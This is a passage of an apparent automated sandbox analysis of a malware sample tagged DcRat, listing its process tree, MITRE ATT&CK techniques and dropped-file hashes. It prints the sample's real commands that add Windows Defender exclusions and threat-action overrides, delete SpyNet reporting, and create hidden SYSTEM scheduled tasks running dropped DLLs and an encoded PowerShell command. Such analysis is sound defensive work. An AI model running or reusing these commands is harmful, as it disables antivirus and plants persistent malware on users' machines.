C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjIQiErgu" /SC once /ST 07:53:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjIQiErgu"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjIQiErgu"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 00:51:23 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\vaxPtPs.exe\" KS /bvsite_idTMx 385119 /S" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GyWbuVQzPmDmgkCMH"2⤵
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\vaxPtPs.exeC:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\vaxPtPs.exe KS /bvsite_idTMx 385119 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\pdqXAj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ztlTbPYifermRZH2" /F /xml "C:\Program Files (x86)\oVhJPNkDU\oKlhKdZ.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ztlTbPYifermRZH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ztlTbPYifermRZH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lYRFoiYPtWPCfC" /F /xml "C:\Program Files (x86)\DlbZONUGhjVU2\ayneOMs.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TrprvximDXTQo2" /F /xml "C:\ProgramData\nBRnpywzcTvqknVB\NTdmLBk.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NtSpqNxSmBAhIMqiB2" /F /xml "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\MeffiZk.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFXJCgZLnIrdqQxYYQs2" /F /xml "C:\Program Files (x86)\KrPQunXfXpAVC\NsLzZct.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HKFMMLmWpeGdwIqGl" /SC once /ST 22:30:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\YaCskhYt\AafvdvS.dll\",#1 /DWsite_idAwZ 385119" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "HKFMMLmWpeGdwIqGl"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GyWbuVQzPmDmgkCMH"2⤵
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\YaCskhYt\AafvdvS.dll",#1 /DWsite_idAwZ 3851191⤵
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\YaCskhYt\AafvdvS.dll",#1 /DWsite_idAwZ 3851192⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "HKFMMLmWpeGdwIqGl"3⤵
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
3Windows Service
3Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
3Windows Service
3Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpiFilesize
1.2MB
MD50ccf501f170091054c3ca8aa16092902
SHA1bfe146d45bb404c64ee25050daa6ad6a57302ef5
SHA25649df8da97d362866e8abc9ed3caafdaa239a1805d442008f9670ec7baa8cf055
SHA512dabfbd68e00fd6b00841355dd003bfae5c70443aafb9b912b6948058a45cec0c2f112a5f551761517783fa9371ea6801c284111e20e3e2b78a01b8e3eb8dedce
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
10KB
MD5b82fec275b011e3682621b2a0f0cc035
SHA12d7e93881e9bedc534cdd4b471421b40c16f3ecc
SHA2563f4f4ee22b196bb9b1d4ce64df3b694648c59e49b265aecc9f1401f0a50bda45
SHA512ccfaa7db69fafab1d23057e938c3105414f062704cde65556f27cc75b7d81933df8d169b1d00fa1bced70cb309b85aba7bb0f67f4c3ead59bd8bd11857bc04db
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\F01YT1OE\edgecompatviewlist[1].xmlFilesize
74KB
MD5d4fc49dc14f63895d997fa4940f24378
SHA13efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\MWDEN7OI\B8BxsscfVBr[1].icoFilesize
1KB
MD5e508eca3eafcc1fc2d7f19bafb29e06b
SHA1a62fc3c2a027870d99aedc241e7d5babba9a891f
SHA256e6d1d77403cd9f14fd2377d07e84350cfe768e3353e402bf42ebdc8593a58c9a
SHA51249e3f31fd73e52ba274db9c7d306cc188e09c3ae683827f420fbb17534d197a503460e7ec2f1af46065f8d0b33f37400659bfa2ae165e502f97a8150e184a38c
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\OY912XWC\suggestions[1].en-USFilesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\~DFFBE329B163A06F48.TMPFilesize
16KB
MD5e51f3c08df36769e4853e8f4eaf9b80a
SHA16d534c3ece2dec97e9f5676c1c106f3a6580f7ce
SHA256ee423af431a98712b2e75077db54d015fd87ce1e30ce2803dfabe908a2b6fed1
SHA512dfe7a632a4301d446b260bbc742c69ade075c91ec86d7b7570e160381786c6553dc12463f849a267ba8539e11b6741d0c3aa416bdcaee62e839e6f4a38ca34c1
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\64DQX6TN\intersection-observer.min[1].jsFilesize
5KB
MD5936a7c8159737df8dce532f9ea4d38b4
SHA18834ea22eff1bdfd35d2ef3f76d0e552e75e83c5
SHA2563ea95af77e18116ed0e8b52bb2c0794d1259150671e02994ac2a8845bd1ad5b9
SHA51254471260a278d5e740782524392249427366c56b288c302c73d643a24c96d99a487507fbe1c47e050a52144713dfeb64cd37bc6359f443ce5f8feb1a2856a70a
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\64DQX6TN\spf[1].jsFilesize
40KB
MD5892335937cf6ef5c8041270d8065d3cd
SHA1aa6b73ca5a785fa34a04cb46b245e1302a22ddd3
SHA2564d6a0c59700ff223c5613498f31d94491724fb29c4740aeb45bd5b23ef08cffa
SHA512b760d2a1c26d6198e84bb6d226c21a501097ee16a1b535703787aaef101021c8269ae28c0b94d5c94e0590bf50edaff4a54af853109fce10b629fa81df04d5b3
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\B71OFA8F\KFOlCnqEu92Fr1MmEU9vBg[1].woff2Filesize
49KB
MD508c655068d5dd3674b4f2eaacb470c03
SHA19430880adc2841ca12c163de1c1b3bf9f18c4375
SHA2564fc8591cc545b7b4f70d80b085bf6577fad41d5d30ddd4f0d0c8ab792084c35e
SHA512b2fce4bc018fa18de66095cc33d95455a4d544e93d512b02bcb8af06aadb550cd0f4aecbceaa013857196c91b6e3c4565a199835cfb37c682cb7bddb69420198
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\B71OFA8F\KFOlCnqEu92Fr1MmSU5vBg[1].woff2Filesize
49KB
MD58a62a215526d45866385d53ed7509ae8
SHA15f22bfd8ff7dab62ac11b76dee4ef04b419d59b5
SHA25634ccd21cf8cc2a2bdcd7dbe6bef05246067ff849bf71308e207bf525f581763d
SHA512845f721e564e03955c34607c9c9cf4000db46788313ebf27c1d12473c7948cf2609b08b24093c5d01f6c97acc79456e7aa838c291462bfb19700bbfd07ee243f
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\B71OFA8F\KFOmCnqEu92Fr1Me4A[1].woff2Filesize
49KB
MD5ee26c64c3b9b936cc1636071584d1181
SHA18efbc8a10d568444120cc0adf001b2d74c3a2910
SHA256d4d175f498b00516c629ce8af152cbe745d73932fa58cc9fdfc8e4b49c0da368
SHA512981a0d065c999eea3c61a2ba522cb64a0c11f0d0f0fe7529c917f956bce71e1622654d50d7d9f03f37774d8eee0370cfb8a86a0606723923b0e0061e1049cbc6
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\B71OFA8F\network[1].jsFilesize
16KB
MD5d954c2a0b6bd533031dab62df4424de3
SHA1605df5c6bdc3b27964695b403b51bccf24654b10
SHA256075b233f5b75cfa6308eacc965e83f4d11c6c1061c56d225d2322d3937a5a46b
SHA5124cbe104db33830405bb629bf0ddceee03e263baeb49afbfb188b941b3431e3f66391f7a4f5008674de718b5f8af60d4c5ee80cfe0671c345908f247b0cfaa127
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\B71OFA8F\scheduler[1].jsFilesize
9KB
MD53c38e345189d10c70793533ba5f04ee1
SHA1130afb88e1c146ac2d2330943f18f507e93a6917
SHA256fd4b34a44fee844ad070594220a3a87cfe742ae69acfd94e776699d41e3b4a0c
SHA512d590dfff6e67094acafb5ef18c19783dc2e5b970b40403e90276a67463cbf2147ea25782d5addd09b93107a900805024f68bda770ca11de2136da574d870774d
-
